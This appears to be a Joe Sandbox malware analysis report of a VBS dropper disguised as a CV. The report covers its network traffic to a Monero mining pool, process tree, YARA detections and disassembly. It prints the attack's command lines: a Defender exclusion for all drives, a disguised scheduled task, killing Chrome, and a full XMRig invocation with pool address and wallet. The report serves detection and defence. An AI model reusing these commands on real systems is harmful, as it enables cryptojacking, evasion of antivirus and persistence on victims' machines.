2024-01-04 07:49:30 UTC	1369	IN	Data Raw: fa 4d 1f b2 52 d1 6e 29 91 89 81 62 36 5c 7e 9c 95 a6 2e 7e 13 0e 35 23 90 12 22 6a cd 03 04 d2 3f be 4a 18 e7 7f 3c d4 a5 9f 59 6e fd f9 34 e5 f7 c9 c9 fc 22 29 f5 f1 75 c7 74 41 3c 67 28 18 68 27 9d 20 8f ab 04 96 79 6f 17 f4 1d 8e e7 83 ca 81 ea 89 ed 38 6d 47 78 60 be ab 87 cf 3f 74 53 f0 ae 53 7f c7 fe 64 00 b2 9a 80 e2 dd c0 d3 b0 b0 49 4c 50 d6 25 f5 b7 21 97 53 f9 11 68 7d 63 d5 87 f2 8a 81 19 5a f6 e7 b6 d0 49 89 4f c9 9d 4c e6 d4 8c 7a fe 0c 72 45 7b a7 33 78 55 32 a7 eb 2c 05 7a 26 06 e2 a0 fd dc 04 15 8b 22 54 6b 5f 68 99 3c 08 04 24 8b 69 7c 9e c3 a2 4a 02 5c 71 da 41 26 4e 6c fa 29 f6 8f 34 6a 69 5a 97 00 59 6d ca 76 71 1d b3 41 14 1c c2 de 43 a5 87 b9 9e ee af 2a b1 b3 0d f1 fa ff 46 12 0d 93 1b 28 8c 3e 20 31 42 7f 35 d9 1a 45 b2 7b 18 18 Data Ascii: MRn)b6\~.~5#"j?J<Yn4")utA<g(h' yo8mGx`?tSSdILP%!Sh}cZIOLzrE{3xU2,z&"Tk_h<$i\|J\qA&Nl)4jiZYmvqAC*F(> 1B5E{
2024-01-04 07:49:30 UTC	1369	IN	Data Raw: 37 ea c8 fa f6 6b 61 6b 6f 83 e2 c7 b2 9e 3e 2e 31 ca 07 bc 68 82 5e 17 34 d7 e8 07 3d f6 fe ff 55 26 81 4d b0 50 db a2 8d 36 fd 26 39 56 4b 27 62 d1 95 46 66 1f 8f fc bf dd 02 77 3c ec 1f 4a 9d 8b ae 1f e0 84 1b 97 9f 6b a2 9f e4 a7 ff 6d a8 0c 4c df 5d 12 eb 1b 33 ad 2e b1 a6 24 28 aa c7 b6 3f ad 80 45 32 0b bc ee f9 9b a7 82 c3 21 e7 87 28 e5 b8 a8 c0 20 7c 2a e2 17 2a 70 8a 00 57 4c b0 17 72 c2 8a db af 07 62 56 6b bc ce cb fd cc c0 5f 7a 8e 48 48 cd 89 cc f3 3a 17 25 e6 4d 35 8c c9 80 d3 53 08 39 a1 36 7d ee 60 fc ab 73 53 94 15 54 65 d5 58 15 84 ad 49 ea bc 74 1d 72 b4 3e de 09 3d 7e 5c 79 ff 8d ea 52 ca b0 7e d1 d3 5e f9 53 6f 85 21 56 c1 4d 97 6c 3b 54 1e 8b b4 dd 27 af 43 29 e3 c3 79 ff ee d1 ba 3e fc ce ee 78 2f 4c 8b ec 1f 28 24 b4 be a7 b3 19 Data Ascii: 7kako>.1h^4=U&MP6&9VK'bFfw<JkmL]3.$(?E2!( \|**pWLrbVk_zHH:%M5S96}`sSTeXItr>=~\yR~^So!VMl;T'C)y>x/L($

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49708	141.94.96.144	443	3220	C:\Users\Public\WindowsUpdate\mservice.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-04 07:49:40 UTC	607	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 36 68 39 6b 5a 69 64 73 6b 32 56 55 6d 51 4e 76 37 32 53 4c 4d 4d 72 69 7a 54 6e 53 4a 54 59 74 48 4a 52 46 58 65 42 72 5a 63 44 4a 6a 56 48 54 6e 38 33 54 35 74 65 59 6a 55 67 67 44 4e 4c 62 54 59 64 77 67 73 67 48 51 43 32 4e 33 4c 7a 6f 4e 51 64 71 70 70 4e 36 53 59 6d 6a 59 72 22 2c 22 70 61 73 73 22 3a 22 30 34 30 31 2d 30 38 68 34 39 6d 22 2c 22 61 67 65 6e 74 22 3a 22 57 69 6e 64 6f 77 73 20 4e 65 74 77 6f 72 6b 20 53 65 72 76 69 63 65 2f 31 2e 31 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46h9kZidsk2VUmQNv72SLMMrizTnSJTYtHJRFXeBrZcDJjVHTn83T5teYjUggDNLbTYdwgsgHQC2N3LzoNQdqppN6SYmjYr","pass":"0401-08h49m","agent":"Windows Network Service/1.1.0 (Windows NT 10.0; Win64; x64) libuv/1.
2024-01-04 07:49:40 UTC	539	IN	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 38 30 38 66 32 33 30 36 2d 38 39 36 31 2d 34 62 39 64 2d 62 38 64 30 2d 31 65 62 64 36 66 31 35 63 32 39 65 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 33 63 35 64 39 61 63 30 36 32 30 39 34 32 39 38 66 38 30 66 33 30 30 39 38 38 31 35 31 39 63 61 33 66 34 34 32 36 38 37 33 61 62 64 33 61 62 35 36 35 34 64 32 31 64 33 30 35 64 66 65 30 31 65 32 64 61 66 36 66 65 33 62 30 30 30 30 30 30 30 30 32 33 35 66 62 63 64 39 64 39 61 31 35 37 33 63 64 37 64 61 35 61 36 32 66 64 39 63 33 36 63 33 37 33 32 35 39 34 64 38 64 62 37 30 63 36 61 37 65 39 34 39 36 37 61 32 62 39 36 30 31 63 38 Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"808f2306-8961-4b9d-b8d0-1ebd6f15c29e","job":{"blob":"1010f3c5d9ac062094298f80f3009881519ca3f4426873abd3ab5654d21d305dfe01e2daf6fe3b00000000235fbcd9d9a1573cd7da5a62fd9c36c3732594d8db70c6a7e94967a2b9601c8
2024-01-04 07:49:45 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 38 63 36 64 39 61 63 30 36 32 30 39 34 32 39 38 66 38 30 66 33 30 30 39 38 38 31 35 31 39 63 61 33 66 34 34 32 36 38 37 33 61 62 64 33 61 62 35 36 35 34 64 32 31 64 33 30 35 64 66 65 30 31 65 32 64 61 66 36 66 65 33 62 30 30 30 30 30 30 30 30 63 66 31 32 38 61 66 37 64 31 35 37 63 66 63 30 63 38 35 62 38 65 66 31 65 62 66 61 33 65 39 39 36 39 34 61 64 34 35 38 31 36 64 63 36 64 34 38 31 38 64 62 65 39 38 34 64 38 63 35 32 33 37 35 31 62 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 55 76 52 4b 68 59 77 70 37 4c 35 68 68 62 4e 46 43 75 42 6f 5a 39 4e 41 7a 6e 56 71 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101098c6d9ac062094298f80f3009881519ca3f4426873abd3ab5654d21d305dfe01e2daf6fe3b00000000cf128af7d157cfc0c85b8ef1ebfa3e99694ad45816dc6d4818dbe984d8c523751b","job_id":"UvRKhYwp7L5hhbNFCuBoZ9NAznVq","target":"8
2024-01-04 07:50:04 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 63 63 36 64 39 61 63 30 36 32 30 39 34 32 39 38 66 38 30 66 33 30 30 39 38 38 31 35 31 39 63 61 33 66 34 34 32 36 38 37 33 61 62 64 33 61 62 35 36 35 34 64 32 31 64 33 30 35 64 66 65 30 31 65 32 64 61 66 36 66 65 33 62 30 30 30 30 30 30 30 30 62 66 35 37 30 36 61 63 61 30 66 31 33 31 34 64 38 39 32 37 30 61 62 63 64 35 32 31 31 64 37 33 36 64 30 61 30 33 33 64 30 35 38 37 65 30 31 62 31 30 37 37 36 36 32 31 33 34 32 37 66 31 62 64 31 63 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 52 37 4c 30 69 70 77 2b 44 73 48 6c 6a 63 77 45 6f 71 38 30 68 6f 45 33 6a 76 47 6c 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010acc6d9ac062094298f80f3009881519ca3f4426873abd3ab5654d21d305dfe01e2daf6fe3b00000000bf5706aca0f1314d89270abcd5211d736d0a033d0587e01b107766213427f1bd1c","job_id":"R7L0ipw+DsHljcwEoq80hoE3jvGl","target":"8
2024-01-04 07:50:19 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 61 63 36 64 39 61 63 30 36 32 30 39 34 32 39 38 66 38 30 66 33 30 30 39 38 38 31 35 31 39 63 61 33 66 34 34 32 36 38 37 33 61 62 64 33 61 62 35 36 35 34 64 32 31 64 33 30 35 64 66 65 30 31 65 32 64 61 66 36 66 65 33 62 30 30 30 30 30 30 30 30 62 30 34 35 66 36 31 33 33 30 39 66 38 38 34 30 38 39 37 37 32 33 30 65 31 62 66 34 39 65 35 32 33 32 32 39 34 37 62 39 64 62 65 30 34 38 38 65 62 30 36 39 33 64 33 37 33 64 66 64 63 39 33 35 32 31 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 55 76 51 64 63 37 51 42 78 38 36 68 4a 6d 34 78 34 5a 62 35 35 2b 4f 6b 63 71 2b 35 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bac6d9ac062094298f80f3009881519ca3f4426873abd3ab5654d21d305dfe01e2daf6fe3b00000000b045f613309f88408977230e1bf49e52322947b9dbe0488eb0693d373dfdc93521","job_id":"UvQdc7QBx86hJm4x4Zb55+Okcq+5","target":"8
2024-01-04 07:50:30 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 36 63 36 64 39 61 63 30 36 32 30 39 34 32 39 38 66 38 30 66 33 30 30 39 38 38 31 35 31 39 63 61 33 66 34 34 32 36 38 37 33 61 62 64 33 61 62 35 36 35 34 64 32 31 64 33 30 35 64 66 65 30 31 65 32 64 61 66 36 66 65 33 62 30 30 30 30 30 30 30 30 39 63 62 65 63 30 61 62 39 31 61 62 35 32 32 39 64 36 64 62 61 62 65 37 61 63 35 35 62 62 63 64 37 65 34 64 30 32 63 65 37 33 37 33 63 30 38 36 36 36 66 33 34 66 36 63 36 65 65 38 34 30 65 32 32 34 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 30 30 31 35 65 69 6b 78 38 4a 75 47 48 4d 47 52 4a 55 33 49 72 78 6e 6b 52 6f 57 2f 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010c6c6d9ac062094298f80f3009881519ca3f4426873abd3ab5654d21d305dfe01e2daf6fe3b000000009cbec0ab91ab5229d6dbabe7ac55bbcd7e4d02ce7373c08666f34f6c6ee840e224","job_id":"0015eikx8JuGHMGRJU3IrxnkRoW/","target":"8
2024-01-04 07:50:42 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 31 63 36 64 39 61 63 30 36 32 30 39 34 32 39 38 66 38 30 66 33 30 30 39 38 38 31 35 31 39 63 61 33 66 34 34 32 36 38 37 33 61 62 64 33 61 62 35 36 35 34 64 32 31 64 33 30 35 64 66 65 30 31 65 32 64 61 66 36 66 65 33 62 30 30 30 30 30 30 30 30 33 37 38 36 37 63 65 63 65 61 62 62 39 31 61 62 34 64 38 31 31 37 31 37 31 66 38 64 61 63 64 39 64 63 35 65 64 36 61 65 61 32 38 39 64 32 33 31 66 35 30 37 39 66 61 62 37 65 39 30 36 62 31 66 32 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 4a 49 66 68 34 63 73 6f 6d 48 69 4a 6b 2f 6a 56 4f 47 5a 5a 47 57 6c 6f 33 44 51 61 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d1c6d9ac062094298f80f3009881519ca3f4426873abd3ab5654d21d305dfe01e2daf6fe3b0000000037867ceceabb91ab4d8117171f8dacd9dc5ed6aea289d231f5079fab7e906b1f25","job_id":"JIfh4csomHiJk/jVOGZZGWlo3DQa","target":"8
2024-01-04 07:50:53 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 63 63 36 64 39 61 63 30 36 32 30 39 34 32 39 38 66 38 30 66 33 30 30 39 38 38 31 35 31 39 63 61 33 66 34 34 32 36 38 37 33 61 62 64 33 61 62 35 36 35 34 64 32 31 64 33 30 35 64 66 65 30 31 65 32 64 61 66 36 66 65 33 62 30 30 30 30 30 30 30 30 33 36 34 34 61 38 34 37 35 34 62 31 39 35 37 31 39 62 66 39 39 38 66 64 35 61 35 33 66 36 64 64 36 62 39 37 31 31 36 64 66 61 38 34 36 64 61 64 36 30 65 66 37 66 62 61 34 66 31 35 32 39 35 30 32 36 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 6d 51 77 6e 2b 78 53 78 52 59 63 79 2b 50 4b 36 59 73 56 51 4a 4b 51 6c 53 59 76 68 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010dcc6d9ac062094298f80f3009881519ca3f4426873abd3ab5654d21d305dfe01e2daf6fe3b000000003644a84754b195719bf998fd5a53f6dd6b97116dfa846dad60ef7fba4f15295026","job_id":"mQwn+xSxRYcy+PK6YsVQJKQlSYvh","target":"8

Target ID:	0
Start time:	08:48:59
Start date:	04/01/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs"
Imagebase:	0x7ff7119b0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:48:59
Start date:	04/01/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie.vbs
Imagebase:	0x7ff7119b0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:49:10
Start date:	04/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Imagebase:	0x7ff7a8540000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:49:10
Start date:	04/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:49:10
Start date:	04/01/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:49:13
Start date:	04/01/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:49:30
Start date:	04/01/2024
Path:	C:\Users\Public\7g.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z
Imagebase:	0x9d0000
File size:	584'704 bytes
MD5 hash:	58FC6DE6C4E5D2FDA63565D54FEB9E75
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000003.2420735515.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000000B.00000003.2421001359.0000000003270000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 1%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:49:30
Start date:	04/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:49:32
Start date:	04/01/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
Imagebase:	0x7ff7a8540000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:49:34
Start date:	04/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:49:34
Start date:	04/01/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
Imagebase:	0x7ff7119b0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:49:34
Start date:	04/01/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
Imagebase:	0x7ff6e6c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	08:49:35
Start date:	04/01/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\taskkill.exe" /f /im chrome.exe
Imagebase:	0x7ff7a7c70000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:49:35
Start date:	04/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	08:49:36
Start date:	04/01/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
Imagebase:	0x7ff7119b0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:49:37
Start date:	04/01/2024
Path:	C:\Users\Public\WindowsUpdate\mservice.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 46h9kZidsk2VUmQNv72SLMMrizTnSJTYtHJRFXeBrZcDJjVHTn83T5teYjUggDNLbTYdwgsgHQC2N3LzoNQdqppN6SYmjYr -p 0401-08h49m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
Imagebase:	0x7ff7bd440000
File size:	4'770'304 bytes
MD5 hash:	CFC0000B993A31C11EF58AC53837E4E1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000000.2492318831.00007FF7BD782000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Joe Security Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\Public\WindowsUpdate\mservice.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 56%, ReversingLabs Detection: 73%, Virustotal, Browse
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	08:49:38
Start date:	04/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	08:49:44
Start date:	04/01/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Imagebase:	0x7ff7119b0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	08:49:52
Start date:	04/01/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Imagebase:	0x7ff7119b0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: wscript.exePID: 1540, Parent PID: 1064

General

Target ID:	25
Start time:	08:51:01
Start date:	04/01/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
Imagebase:	0x7ff7119b0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Disassembly

Reset < >

Analysis Process: 7g.exePID: 1968, Parent PID: 6888COMMON

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	78

Executed Functions

Function 009D9032 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000020,009E0BCB,?,75BFAB50,?,?,?,?,009E0BCB,009E09F5), ref: 009D9048
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,009E0BCB,009E09F5), ref: 009D904F
LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 009D9061
AdjustTokenPrivileges.ADVAPI32(009E0BCB,00000000,?,00000000,00000000,00000000), ref: 009D9087
GetLastError.KERNEL32 ref: 009D9091
FindCloseChangeNotification.KERNELBASE(009E0BCB,?,?,?,?,009E0BCB,009E09F5), ref: 009D90A7

Strings

SeRestorePrivilege, xrefs: 009D905D

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ProcessToken$AdjustChangeCloseCurrentErrorFindLastLookupNotificationOpenPrivilegePrivilegesValue
String ID: SeRestorePrivilege
API String ID: 2838110999-1684392131
Opcode ID: d049bba0b76b017bf5249e12fe01931f2031792d688f4b63420423a0a527954d
Instruction ID: ad1eb8840ca7c31c9ead00a3360ded25714dd2f17f3c6daada4f8d83747197cd
Opcode Fuzzy Hash: d049bba0b76b017bf5249e12fe01931f2031792d688f4b63420423a0a527954d
Instruction Fuzzy Hash: 2E018479A81214AFDB20ABF1EC49ADF7F7CAF46300F040055E942E2250D6768659D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 009E2A5F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 009E2A64
GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,75C28E30), ref: 009E2A76
OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,75C28E30), ref: 009E2A8D
LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 009E2AAF
